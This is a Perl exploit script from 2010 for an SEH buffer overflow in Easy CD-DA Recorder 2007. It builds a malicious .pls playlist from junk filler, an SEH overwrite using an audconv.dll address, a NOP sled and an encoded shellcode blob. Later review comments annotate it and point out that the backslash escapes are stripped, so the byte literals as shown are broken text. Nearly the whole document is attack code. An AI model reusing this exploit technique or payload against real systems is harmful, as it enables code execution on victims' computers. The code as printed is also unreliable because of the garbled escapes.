
# Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow
# Published : 2010-06-07
# Author : chap0


# Exploit Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow 
# Date          : June 7, 2010
# Author        : chap0 [http://www.seek-truth.net]
# Software Link : http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html
# Tested on     : Windows XP SP3 En
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# The Crew		: http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Advisory		: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048
# --------------------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Code :
# Flat script: builds a single byte string and writes it to "easy.pls" in the
# current directory.  No strictures are enabled (no `use strict; use warnings;`),
# so undeclared globals (see $padding below) are accepted silently.
#
# NOTE(review): throughout this listing the string literals read "x41", "n",
# etc. rather than "\x41", "\n" -- the backslash escapes appear to have been
# stripped when the page was extracted.  As written, every literal is plain
# ASCII text, so the banner prints a trailing "n" instead of a newline and the
# generated file contains the characters x, 4, 1 rather than single bytes.
# Left untouched here; the comments describe the author's evident intent.

# Banner output.
print "|------------------------------------------------------------------|n";
print "|                         __               __                      |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] Exploit for Easy CD-DA Recorder n";
print "[+] Preparing payloadn";
# Purely cosmetic pause; has no effect on the file that is produced.
sleep(1);
# Filler region: 1108 repetitions of the literal (intended as 0x41 / 'A').
# A playlist whose entry is a long uniform run of 'A' bytes followed by
# non-printable data is the observable signature of this file; nothing in a
# legitimate .pls entry looks like it.
my $junk="x41" x 1108;

# Value intended for the "next SEH record" pointer slot of the exception
# registration record (the title describes this as an SEH overwrite).
my $nseh="xebx06x90x90";

# Value intended for the SEH handler slot.  Per the author's note it is an
# address inside audconv.dll; the address being usable at all depends on that
# module lacking SafeSEH/ASLR protections -- presumably, not shown here.
my $seh= "x70x80x08x10";   # ppr 0x10088070 [audconv.dll] 

# 24 bytes of intended 0x90 (NOP) padding ahead of the payload.
my $nops="x90" x 24;

# Opaque byte string.  This page does not document what it does when executed;
# treat it as untrusted and do not run it.
my $shellcode=
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
"x42x30x42x50x42x30x4bx38x45x44x4ex53x4bx48x4ex47".
"x45x50x4ax37x41x30x4fx4ex4bx38x4fx44x4ax51x4bx38".
"x4fx35x42x42x41x50x4bx4ex49x54x4bx38x46x43x4bx38".
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x38x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
"x46x4fx4bx43x46x35x46x42x46x30x45x47x45x4ex4bx38".
"x4fx45x46x52x41x30x4bx4ex48x36x4bx58x4ex50x4bx34".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx38x4ex31x4bx48".
"x41x30x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x43".
"x42x4cx46x56x4bx38x42x54x42x53x45x38x42x4cx4ax47".
"x4ex30x4bx58x42x34x4ex30x4bx38x42x57x4ex51x4dx4a".
"x4bx48x4ax36x4ax50x4bx4ex49x30x4bx48x42x58x42x4b".
"x42x50x42x30x42x50x4bx38x4ax46x4ex53x4fx35x41x53".
"x48x4fx42x56x48x55x49x48x4ax4fx43x48x42x4cx4bx37".
"x42x45x4ax46x42x4fx4cx48x46x30x4fx55x4ax46x4ax39".
"x50x4fx4cx48x50x50x47x35x4fx4fx47x4ex43x56x41x56".
"x4ex46x43x46x42x30x5a";

# Trailing filler (10000 repetitions).  Note: $padding is never declared with
# `my`, unlike every other variable above; this only works because the script
# does not enable `use strict`.
$padding = "x41" x 10000;

# Final file contents: filler, SEH record fields, NOP pad, payload, trailing pad.
my $payload = $junk.$nseh.$seh.$nops.$shellcode.$padding;

# Bareword filehandle, two-argument open (mode is taken from the string
# prefix '>'), and the return value is not checked -- a failed open would
# go unnoticed and the print/close below would warn or be lost.
open (myfile, '>easy.pls');

print myfile $payload;

# Return value of close is also unchecked; buffered write errors surface here.
close (myfile);

print "[+] Storm the Gates of Helln"